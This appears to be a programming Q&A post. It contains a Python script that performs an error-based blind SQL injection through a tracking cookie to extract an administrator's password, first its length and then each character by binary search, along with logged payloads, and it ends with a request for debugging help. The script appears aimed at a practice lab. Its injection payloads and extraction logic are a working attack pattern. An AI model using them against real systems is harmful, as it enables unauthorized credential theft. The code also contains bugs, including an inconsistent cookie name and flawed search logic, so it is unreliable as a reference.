Reputation: 19
Binary search in Error Based Blind SQL with Python
import requests
url=input("URL:")
track=input("Tracking ID:")
sess=input("Session ID:")
password = ('')
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
def uzun_tespit(pl):
ck = {'TrackingId': pl, 'session': sess}
cvp = requests.get(url, cookies=ck)
print(f"Payload: {pl} | Status Code: {cvp.status_code}")
print(f"Response Text: {cvp.text[:500]}")
return cvp.status_code == 200
def uzun_bul():
for uz in range(1, 25):
pl = f"{track}'||(SELECT CASE WHEN LENGTH(password)>{uz} THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'"
print(f"Denenen Uzunluk: {uz}")
if uzun_tespit(pl):
return uz
return None
passuz = uzun_bul()
print(f"Şifre uzunluğu: {passuz} ")
def pass_tespit(pl):
inf = {'TrackingID': pl, 'session': sess}
cvp = requests.get(url, cookies=inf)
print(f"Payload{pl}, Status: {cvp.status_code}")
return cvp.status_code == 500
def char_bul(digit):
alt = 0
ust = len(chars) - 1
while alt <= ust:
orta = (alt + ust) // 2
char = chars[orta]
pl = f"{track}' AND (SELECT CASE WHEN SUBSTR(password,{digit},1)='{char}' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'"
if pass_tespit(pl):
return char
elif pass_tespit(f"{track}' AND (SELECT CASE WHEN SUBSTR(password,{digit},1)>'{char}' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'"):
alt = orta + 1
else:
ust = orta - 1
return None
def sifre_bul(passuz):
password = ''
for i in range(1, passuz + 1):
char = char_bul(i)
if char:
password += char
print(f"{i}. karakter: {char}")
else:
print(f"{i}. karakter yok. Şifre tamamlandı.")
break
return password
password = sifre_bul(passuz)
print(f"Password: {password}")
Payload: YPIFNFVqUmqRx30y' AND (SELECT CASE WHEN SUBSTR(password,1,1)='g' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' | Status Code: 500 Response Text:
Payload: YPIFNFVqUmqRx30y' AND (SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' | Status Code: 500 Response Text:
Payload: YPIFNFVqUmqRx30y' AND (SELECT CASE WHEN SUBSTR(password,1,1)='c' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' | Status Code: 500 Response Text:
So first one is my code and second one is my output after stating the password length. I try to find with binary search but it wont work. I know that problem is in function, char_bul but however I cant find any logical reason. Please help and thanks to everyone who reply.
Upvotes: 0
Views: 40
Answers (0)
Related Questions
- How to upgrade all Python packages with pip
- Writing a list to a file with Python, with newlines
- How to add a column with a default value to an existing table in SQL Server?
- Search text in stored procedure in SQL Server
- Use different Python version with virtualenv
- How can I do an UPDATE statement with JOIN in SQL Server?
- SQL Update from One Table to Another Based on a ID Match
- How can I delete using INNER JOIN with SQL Server?